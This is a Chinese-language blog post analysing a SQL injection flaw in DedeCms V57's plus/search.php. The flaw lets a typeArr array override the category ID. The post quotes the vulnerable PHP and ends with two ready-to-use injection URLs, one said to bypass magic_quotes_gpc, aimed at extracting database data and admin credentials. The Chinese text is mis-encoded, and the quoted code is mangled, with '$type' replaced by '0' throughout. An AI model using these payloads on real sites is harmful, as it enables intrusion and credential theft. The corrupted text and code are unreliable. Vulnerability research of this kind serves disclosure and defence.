DedeCms V57 plus/search.php文件SQL注射

微博上看到就分析了一下,這個(gè)漏洞不止一處地方可以被利用.其實(shí)可以無(wú)視magic_quotes_gpc = On的時(shí)候.真心不雞肋.

    作者: c4rp3nt3r@0x50sec.org

    Dedecms最新版 plus/search.php 文件存在變量覆蓋漏洞,成功利用該漏洞可以獲取管理員密碼.

    黑哥說(shuō)漏洞已補(bǔ).怪我沒(méi)有測(cè)試好.也沒(méi)用這個(gè)黑站…不過(guò)這個(gè)漏洞真心不錯(cuò),應(yīng)該有一定利用價(jià)值.標(biāo)題就不改了,補(bǔ)了就公開了吧.

    ============

    Dedecms最新版 plus/search.php 文件存在變量覆蓋漏洞,成功利用該漏洞可以獲取管理員密碼.

1. require_once(dirname(__FILE__).”/../include/common.inc.php”);

2. require_once(DEDEINC.”/arc.searchview.class.php”);

3. 
   

4. $pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;

5. 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;

6. $channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;

7. $kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;

8. $mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

9. 
   

10. if(!isset($orderby)) $orderby=”;

11. else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);

12. 
    

13. 
    

14. if(!isset($searchtype)) $searchtype = ‘titlekeyword’;

15. else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

16. 
    

17. if(!isset($keyword)){

18. if(!isset($q)) $q = ”;

19. $keyword=$q;

20. }

21. 
    

22. $oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

23. 
    

24. //查找欄目信息

25. if(empty(0id))

26. {

27. 0nameCacheFile = DEDEDATA.’/cache/typename.inc’;

28. if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )

29. {

30. $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);

31. fwrite($fp, “<”.”?php\r\n”);

32. $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);

33. $dsql->Execute();

34. while($row = $dsql->GetArray())

35. {

36. fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);

37. }

38. fwrite($fp, ‘?’.'>’);

39. fclose($fp);

40. }

41. //引入欄目緩存并看關(guān)鍵字是否有相關(guān)欄目?jī)?nèi)容

42. require_once(0nameCacheFile);

43. //0Arr這個(gè)數(shù)組是包含生成的臨時(shí)文件 里面定義的,由于dedecms的全局變量機(jī)制,我們可以自己定義一個(gè)

44. //

45. if(isset(0Arr) && is_array(0Arr))

46. {

47. foreach(0Arr as $id=>0name)

48. {

49. 
    

50. $keywordn = str_replace(0name, ‘ ‘, $keyword);  //這個(gè)地方要繞過(guò)

51. if($keyword != $keywordn)

52. {

53. $keyword = $keywordn;

54. 0id = $id; // 這里存在變量覆蓋漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 這句過(guò)濾成了擺設(shè)

55. break;

56. }

57. }

58. }

59. }

    然后plus/search.php文件下面定義了一個(gè) Search類的對(duì)象 .

    在arc.searchview.class.php 文件的SearchView類的構(gòu)造函數(shù) 聲明了一個(gè)TypeLink類.

    $this->TypeLink = new TypeLink(0id);

    TypeLink類的構(gòu)造函數(shù)沒(méi)有經(jīng)過(guò)過(guò)濾,(程序員以為前面已經(jīng)過(guò)濾過(guò)了… )直接帶入了sql語(yǔ)句.

1. class TypeLink

2. {

3. var 0Dir;

4. var $dsql;

5. var $TypeID;

6. var $baseDir;

7. var $modDir;

8. var $indexUrl;

9. var $indexName;

10. var $TypeInfos;

11. var $SplitSymbol;

12. var $valuePosition;

13. var $valuePositionName;

14. var $OptionArrayList;

15. 
    

16. //構(gòu)造函數(shù)///////

17. //php5構(gòu)造函數(shù)

18. function __construct(0id)

19. {

20. $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];

21. $this->indexName = $GLOBALS['cfg_indexname'];

22. $this->baseDir = $GLOBALS['cfg_basedir'];

23. $this->modDir = $GLOBALS['cfg_templets_dir'];

24. $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];

25. $this->dsql = $GLOBALS['dsql'];

26. $this->TypeID = 0id;

27. $this->valuePosition = ”;

28. $this->valuePositionName = ”;

29. $this->typeDir = ”;

30. $this->OptionArrayList = ”;

31. 
    

32. //載入類目信息

33. 
    

34. $query = “SELECT tp.*,ch.typename as

35. ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join

36. `#@__channeltype` ch

37. on ch.id=tp.channeltype  WHERE tp.id=’0id’ “; //注射漏洞發(fā)生在這里,很明顯需要magic_quotes_gpc = Off 雞肋了嗎?好可以吧至少不需要會(huì)員中心阿

38. 
    

39. if(0id > 0)

40. {

41. $this->TypeInfos = $this->dsql->GetOne($query);

    利用代碼一 需要 即使magic_quotes_gpc = Off

    http:// /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

    這只是其中一個(gè)利用代碼… Search 類的構(gòu)造函數(shù)再往下

1. ……省略

2. $this->TypeID = 0id;

3. ……省略

4. if($this->TypeID==”0″){

5. $this->ChannelTypeid=1;

6. }else{

7. $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //這里的注入漏洞無(wú)視magic_quotes_gpc = On的存在哦親

8. //現(xiàn)在不雞肋了吧親…

9. $this->ChannelTypeid=$row['channeltype'];

10. 
    

11. }

    利用代碼二,下面這個(gè)EXP 即使magic_quotes_gpc = On 也可以成功利用.

    http:// /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

    如果那個(gè)數(shù)據(jù)庫(kù)里存在內(nèi)容,就要考慮的復(fù)雜點(diǎn)了.我也沒(méi)考慮那么周全,分析了下然后簡(jiǎn)單測(cè)試了下,也沒(méi)用來(lái)黑站